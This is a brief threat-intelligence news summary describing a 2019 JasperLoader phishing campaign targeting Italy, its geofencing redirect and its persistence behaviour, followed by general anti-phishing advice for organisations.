Sorpresa! JasperLoader Targets Italy with a New Bag of Tricks (May 23, 2019)
Throughout 2019, the malware loader new to this year called “JasperLoader,” has become more active, according to Cisco Talos researchers. A new phishing campaign distributing JasperLoader has been observed to be targeting individuals in Italy. The Italian-written emails are sent with a certified email service that attempts to convince the recipient to follow a URL that results in a “HTTP 302” response that redirects to the website for the China Internet Network Information Center (CNNIC). Researchers believe this tactic is being used for “geofencing” which is used to find the location of infected machines are only in a specified region. The objective of JasperLoader is to achieve persistence via a scheduled task or a registry run key, and then used to download arbitrary malware onto the infected machine.
Recommendation: Emails that attempt to redirect a user to link should be viewed with scrutiny, especially when they come from individuals with whom you do not typically communicate. Education is the best defense. Inform your employees on the dangers of phishing, specifically, how they can take place in different forms of online communications, and whom to contact if a phishing attempt is identified.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.